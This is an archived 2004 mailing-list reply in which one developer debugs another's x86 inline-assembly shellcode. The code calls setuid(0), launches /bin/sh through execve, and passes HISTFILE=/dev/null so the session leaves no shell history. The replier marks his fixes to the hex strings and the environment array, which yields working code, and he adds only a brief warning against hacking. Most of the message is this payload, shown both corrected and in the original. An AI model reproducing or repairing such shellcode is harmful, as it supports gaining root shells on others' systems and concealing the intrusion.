From: Frederic Marmond <fmarmond@eprocess.fr>
To: Danett song <danett18@yahoo.com.br>
Cc: linux-assembly@vger.kernel.org
Subject: Re: execve with env..
Date: Fri, 28 May 2004 10:54:48 +0200 [thread overview]
Message-ID: <40B6FE58.4030405@eprocess.fr> (raw)
In-Reply-To: <20040527210502.96393.qmail@web90105.mail.scd.yahoo.com>
Hi Danett,
I finally had time to have a look at your code.
1rst: the translations (heaxa -> ascii) you gave were wrong. If you play
with assembly, you have to be rigourous and well document your code.
2nd : have a look at
http://www.linuxfocus.org/English/March2001/article183.shtml (many
langage translations available), as it may gives you informations about
what you seem to want to do.
3rd: have a look at the code. I've modified some lines (my tag is 'FMD')
FMD~ => I changed this line
FMD+ => I added this line
FMD- => I removed this line
__asm__(
"xor %eax, %eax \n" // set 0 to %eax
"xor %ebx, %ebx \n" // 1 arg setuid (zero)
"mov $0x17, %al \n" // call setuid
"int $0x80 \n" // kernel mode
"xor %eax,%eax \n" // set 0 to %eax
"push %eax \n" // put zero at stack
"push $0x68732F2F \n" // FMD~: hs//
"push $0x6E69622F \n" // FMD~: nib/
// FMD+: FALSE "put /bin//bash at stack"
// FMD+: it is not "bash", but "sh" you
give as parameter.
// FMD+: it's not a problem, but please,
next time, make right comments!
"mov %esp,%ebx \n" // Copy 1arg execve
"push %eax \n" // put zero at stack
"push %ebx \n" // put %ebx at stack
"mov %esp, %ecx \n" // Copy 2arg execve
"xor %edx, %edx \n" // set 0 to %edx
"push %eax \n" //FMD+: you've forgot this line
"push $0x6C6C756E \n" // FMD~: llun
"push $0x2F2F7665 \n" // FMD~: //ve
"push $0x642F2F3D \n" // FMD~: d//=
"push $0x454C4946 \n" // FMD~: ELIF
// "push $0x54534949 \n" // FMD-: TSII
"push $0x54534948 \n" // FMD+: TSIH
// FMD+: FALSE: "HISTFILE=//dev//null"
// FMD+: wrong hexa code, you wrote
"IISTFILE=...", instead of "HISTFILE=..."
"mov %esp, %edx \n" // FMD+: back up the string pointer
"push %eax \n" // put zero at stack
"push %edx \n" // FMD+: put the env string here in stack
"mov %esp, %edx \n" // copy 3arg execve
"mov $0x0b, %al \n" // call execve
"int $0x80 \n" // kernel mode
"xor %eax,%eax \n" // 1arg of exit (zero)
"mov $0x01,%al \n" // call exit
"int $0x80 \n" // kernel mode
);
As you can see, few typo errors in your comments and hexa strings.
But the most important is that you have to pass 3rd argument to execve
exactly as for its 2nd. (char* []).
I hope your intention is not to hack someone else system, and that you
play with that only for learning purpose...
Keep in mind there are always someone (stronger than you and than me)
that may catch you if you pirate something...
If you have another question, feel free to ask! ;)
Fred
Danett song wrote:
>Hi fmarmond,
>
>
>
>>I have no time today, but I'll try to help you
>>tomorow.
>>
>>
>
>Thkz a lot! :)
>
>
>
>>Can you provide a commented version of your code?
>>
>>
>
>Yah, look below...
>
>#include <stdio.h>
>
>int main(){
>
>__asm__(
> "xor %eax, %eax \n" // set 0 to %eax
> "xor %ebx, %ebx \n" // 1 arg setuid (zero)
> "mov $0x17, %al \n" // call setuid
> "int $0x80 \n" // kernel mode
> "xor %eax,%eax \n" // set 0 to %eax
> "push %eax \n" // put zero at stack
> "push $0x68732F2F \n"
> "push $0x6E69622F \n" // put /bin//bash at
>stack
> "mov %esp,%ebx \n" // Copy 1arg execve
> "push %eax \n" // put zero at stack
> "push %ebx \n" // put %ebx at stack
> "mov %esp, %ecx \n" // Copy 2arg execve
> "xor %edx, %edx \n" // set 0 to %edx
> "push $0x6C6C756E \n"
> "push $0x2F2F7665 \n"
> "push $0x642F2F3D \n"
> "push $0x454C4946 \n"
> "push $0x54534948 \n" // HISTFILE=//dev//null
> "push %eax \n" // put zero at stack
> "mov %esp, %edx \n" // copy 3arg execve
> "mov $0x0b, %al \n" // call execve
> "int $0x80 \n" // kernel mode
> "xor %eax,%eax \n" // 1arg of exit (zero)
> "mov $0x01,%al \n" // call exit
> "int $0x80 \n" // kernel mode
> );
>
>return(0);
>}
>
>Thkz,
>
>______________________________________________________________________
>
>Participe da pesquisa global sobre o Yahoo! Mail:
>http://br.surveys.yahoo.com/global_mail_survey_br
>
>
>
next prev parent reply other threads:[~2004-05-28 8:54 UTC|newest]
Thread overview: 7+ messages / expand[flat|nested] mbox.gz Atom feed top
2004-05-27 17:23 execve with env Danett song
2004-05-27 19:40 ` fmarmond
2004-05-27 21:05 ` Danett song
2004-05-28 8:54 ` Frederic Marmond [this message]
2004-05-31 18:32 ` Danett song
2004-06-01 8:29 ` Frederic Marmond
2004-06-05 17:17 ` Assembler Developer's Kit (ADK)/HLA v2.0 Update Randall Hyde
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=40B6FE58.4030405@eprocess.fr \
--to=fmarmond@eprocess.fr \
--cc=danett18@yahoo.com.br \
--cc=linux-assembly@vger.kernel.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).